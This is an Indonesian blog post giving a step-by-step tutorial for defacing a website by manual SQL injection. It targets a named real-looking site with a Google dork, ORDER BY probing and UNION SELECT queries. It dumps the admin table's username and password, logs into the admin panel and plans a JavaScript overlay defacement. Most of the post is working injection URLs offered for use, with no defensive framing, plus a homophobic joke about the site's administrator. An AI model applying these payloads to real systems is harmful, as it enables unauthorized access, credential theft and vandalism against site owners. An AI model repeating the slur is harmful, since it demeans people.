Senin, 09 November 2015

Cara Deface Manual

1. sediakan google dork yang fresh
    misal ; saya mengunakan dork ini; inurl:"  research.php?cid="
2. masukan di column google
3. jika sudah muncul web nya pilih salah satu
4. saya memilih web korban ini
   htttp://kkverma.com/content/research.php?cid=2



5. jika sudah tambahkan ' pada akhir url untuk memastikan
   vuln / kagak
6. sehingga menjadi
   htttp://kkverma.com/content/research.php?cid=2'
7. jika tertulis u have an error in your sql syntax....blablabla
    berarti web nya vuln
8. kita mencari jumlah database nya dengan perintah"order by"
   http://kkverma.com/content/research.php?cid=2 order by 1-- normal
  http://kkverma.com/content/research.php?cid=2 order by 2-- normal
  http://kkverma.com/content/research.php?cid=2 order by 3-- normal
  http://kkverma.com/content/research.php?cid=2 order by 4-- normal
  http://kkverma.com/content/research.php?cid=2 order by 5-- normal
  http://kkverma.com/content/research.php?cid=2 order by 6-- ERROR
  di 6 kita mendapatkan unknown column'6'in order clause
   berarti  column database nya 5
9. kita mencari angka ajaib mulai
   http://kkverma.com/content/research.php?cid=-2 union select 1,2,3,4,5--
   [ ingat, setelah ?cid= diberi tanda - ]
10. muncul angka ajaib 3,4
11. kita mencoba melihat versi php dg memasukan@@version/version()
   jadi : http://kkverma.com/content/research.php?cid=-2 union select
 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ajaib]
 Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan.
Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari
databasenya.

Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan
mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan
menambahkan perintah
“ from information_schema.tables where table_schema=database() ”
 sesudah angka terakhir , sebelum tanda --
 menjadi
http://kkverma.com/content/research.php?cid=-2
union select 1,2,group_concat(table_name),4,5 from information_schema.tables
where table_schema=database()--


Kita melihat ada table admin, research, vcounter .

Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa
user dan password ? Tentu jawabannya adalah di table admin.
Kita coba melihat kolom dari table admin tersebut .
Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk
MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() .
 Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .
Tutorial Cara Deface Menggunakan SQL Manual

Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)

Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut.
Cara mengganti perintah “ group_concat(table_name) ” dengan perintah
 “ group_concat(column_name) ” dan mengganti perintah “
 information_schema.tables “ menjadi “ information_schema.columns ”
juga mengganti perintah “ table_schema=database() ” dengan perintah
“ table_name=[hasil convert MySQL CHAR() - Step 6] ”

http://kkverma.com/content/research.php?cid=-2
union select 1,2,group_concat(column_name),4,5
from information_schema.columns where table_name=CHAR(97,100,109,105,110)--


Kita mendapat kolom aid, admin id, admin pass di tabel admin.

Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name)
menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass)
dan mengganti perintah “ from information_schema.
columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah
“from admin—“ . disitu kita melihat ada tanda 0x3a.
Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda :
sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union
 select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--


Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay --- adminnya bernama Bimo, orangnya Gay. Hihihi

Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin"
ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder.
Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://kkverma.com/admin


Masukkan user dan password sesuai dengan data yang telah kita dapat.
Dan.......
Tutorial Cara Deface Menggunakan SQL Manual

Uh, indahnya dunia ini. :v
Masuk halaman admin bray. Namun ternyata tidak bisa upload shell. Kita deface saja dengan metode JS Overlay.

0 komentar:

staywithluk.blogspot.com staywithluk.blogspot.com staywithluk.blogspot.com staywithluk.blogspot.com staywithluk.blogspot.com staywithluk.blogspot.com